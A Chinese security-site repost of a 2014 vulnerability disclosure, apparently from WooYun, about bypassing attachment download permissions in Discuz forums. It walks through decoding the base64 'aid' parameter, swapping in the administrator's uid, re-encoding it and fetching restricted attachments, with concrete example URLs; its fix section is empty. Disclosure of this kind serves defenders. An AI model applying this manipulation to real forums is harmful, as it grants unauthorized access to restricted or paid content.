热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Discuz附件下载权限绕过方法

发布时间:2014-03-03 13:15文章来源:wooyun文章作者:Coxxs 点击次数:
摘要:越权下载含有阅读权限的插件、下载插件免扣币 重现步骤: 1、使用管理员账户,上传一个有高阅读权限的附件 2、使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载 此时,浏览器中的附件地址形如 forum.php?mod=attachmentaid=Nzg4fDQwNGQzYjMx...

越权下载含有“阅读权限”的插件、下载插件免扣币

 

重现步骤:

1、使用管理员账户,上传一个有高阅读权限的附件

2、使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载

此时,浏览器中的附件地址形如

forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MzEyNTR8MjY3Mw%3D%3D

 

解码aid

788|404d3b31|1389693838|31254|2673

 

修改其中的uid部分(这里将uid改成了管理员账户:1)

788|404d3b31|1389693838|1|2673

 

编码修改后的aid

forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MXwyNjcz

 

 

此时,成功下载原本需要高权限的附件

 

另外下载的同时还可能会刷新用户的最后登录时间(我也因为这个巧合才发现这个漏洞的,因为某些cdn把地址里的base64全部小写了,造成解析错误,解析成了别人的uid,顺便刷新了最后登录时间)
修复方案:

标签分类:

上一篇:Ecshop后台getshell-2 (解析漏洞拿shell)
下一篇:metinfo多个漏洞(可getshell)